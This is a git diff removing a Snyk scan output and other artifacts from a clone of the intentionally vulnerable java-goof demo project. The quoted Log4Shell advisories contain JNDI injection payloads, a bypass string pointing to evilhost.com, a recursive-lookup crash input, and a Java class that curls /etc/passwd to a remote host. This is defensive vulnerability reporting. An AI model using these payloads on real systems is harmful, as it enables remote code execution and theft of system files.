ecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java":[1593,1707749068023.9092,"aac0c815b65e7aa372635e13a1874b97404796162fdab3c8a2db8ccc665bfb77"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java":[2755,1707749068024.01,"818c334580003a9059f8b9e343eee5527397c1cd54408a278c1e42c1c498af03"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java":[1474,1707749068024.1094,"2b1fe3a7d1afc307195a1803b64955b233d41e26a0d5b38b8029c794ed5f0463"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java":[2204,1707749068025.1648,"b4ae8f17a0cc66a14234de9f635874e100546098e5e67b7999beade579019b15"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java":[3515,1707749068021.8755,"67df60f194c628b276134716f0d43d102d18a4ffdc5bcbd4afe834ad50f8af28"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java":[2167,1707749068022.0413,"b24e9381e1690b8c0ca9535c6fd50d472311f00bd520b4ceadd98d2b5ce80d85"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java":[2085,1707749068022.2034,"af0925afa455c491d83245a16a39c98ac8fec45b4b035070a15d60ef47cfe074"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java":[2105,1707749068022.3518,"82c42e37d2c6c02fc69297379a8183dd8bc8bbd80d29fca2a0868e7a532a1f95"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java":[2569,1707749068021.3772,"f1b0c8025daf900938caf746a85fe7df9cfeef0b85e7525eecc345daddacec83"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java":[2097,1707749068021.4858,"303ba1f62ae2a9251c7fd1e1132bc91c6dbeacb760f0f8bad4d8f802b48bf4c7"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java":[2783,1707749068021.578,"65958478e6c6df53811e97bd5a0e54489272be2e06bfb3a14641922c11e1dc1c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java":[4018,1707749068022.542,"a743f24c83b6992948cb46bf8b2bd4d4b1c11dfd41a81c66c584d80d3b77e0a4"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java":[2347,1707749068024.2808,"23c393191001a8548c66a6112786261fd8821fea6ecbcbaded85ffc695c65499"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java":[4174,1707749068024.5068,"f779cf49f727c3a070c3e17ecb29d4d1c8cc9844158393e7baad575f86c9f311"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java":[11846,1707749068024.6938,"70d6b7ad7b556b98b17dd858b269daed067f4d0f4b6f2d7079c599e469d86168"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java":[2536,1707749068024.7944,"e47d909ef3e3a224f723c2dbdd6b35ee131064090570cdcf3ec0a514efa8767d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java":[2513,1707749068024.883,"142a48bf4f5665546d1168347897fac76cae74d361f9f6a9476c6b90d8c3dc12"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java":[3351,1707749068024.9883,"25a2fbf3e1485401fe11418e42e76149b0f2ec38a1a6dc3dde038be9e0be28d9"]} \ No newline at end of file diff --git a/index.html b/index.html deleted file mode 100644 index 342510837f..0000000000 --- a/index.html +++ /dev/null @@ -1 +0,0 @@ -HTTP Status 429 – Too Many Requests

HTTP Status 429 – Too Many Requests

Type Status Report

Message Rate limit exceeded

Description The user has sent too many requests in a given amount of time ("rate limiting").

\ No newline at end of file diff --git a/output.json b/output.json deleted file mode 100644 index 45a7eb4404..0000000000 --- a/output.json +++ /dev/null @@ -1,65575 +0,0 @@ -[ - { - "vulnerabilities": [], - "ok": true, - "dependencyCount": 0, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\nexclude:\n global:\n - todolist-goof/exploits/zip-slip.py\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "No known vulnerabilities", - "filesystemPolicy": true, - "uniqueCount": 0, - "projectName": "io.github.snyk:java-goof", - "foundProjectCount": 7, - "displayTargetFile": "pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [], - "ok": true, - "dependencyCount": 0, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "No known vulnerabilities", - "filesystemPolicy": false, - "uniqueCount": 0, - "projectName": "io.snyk:log4shell-poc", - "foundProjectCount": 7, - "displayTargetFile": "log4shell-goof/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", - "credit": [ - "Chen Zhaojun of Alibaba Cloud Security Team" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.15.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 10, - "functions": [ - { - "version": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", - "className": "JndiLookup", - "functionName": "lookup" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", - "title": "Apache Jira Issues" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", - "title": "Apache Jira Issues" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/apache/logging-log4j2/pull/608", - "title": "GitHub PR" - }, - { - "url": "https://github.com/Kirill89/log4shell-vulnerable-server", - "title": "PoC" - }, - { - "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", - "title": "Snyk Blog and Vulnerability Breakdown" - }, - { - "url": "https://www.exploit-db.com/exploits/51183", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:48:46.605332Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:58.520882Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:43.264835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:46.605332Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.520882Z" - } - ], - "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", - "epssDetails": { - "percentile": "0.99999", - "probability": "0.97556", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44228" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-jfh8-c2jp-5v3q" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-10T10:08:46.155884Z", - "functions_new": [ - { - "version": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.lookup.JndiLookup", - "functionName": "lookup" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-12-10T10:02:55Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-10T10:10:01Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.500242Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-client@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.14.1" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.16.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.16.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", - "title": "Apache Pony Mail" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://twitter.com/marcioalm/status/1471740771581652995", - "title": "Twitter Post" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", - "title": "Nuclei Templates" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 9, - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:32.295395Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99913", - "probability": "0.97364", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45046" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-7rjr-3q55-vv33" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-14T18:28:31.339218Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-14T18:01:28Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-14T18:44:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.837600Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-client@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.16.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.14.1" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Hideki Okamoto of Akamai Technologies" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.3)", - "[2.13.0,2.17.0)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.1", - "2.12.3", - "2.17.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", - "title": "JIRA Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:38.288854Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", - "epssDetails": { - "percentile": "0.99624", - "probability": "0.96524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45105" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-17T18:23:58.542986Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-17T18:20:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-18T07:05:00Z", 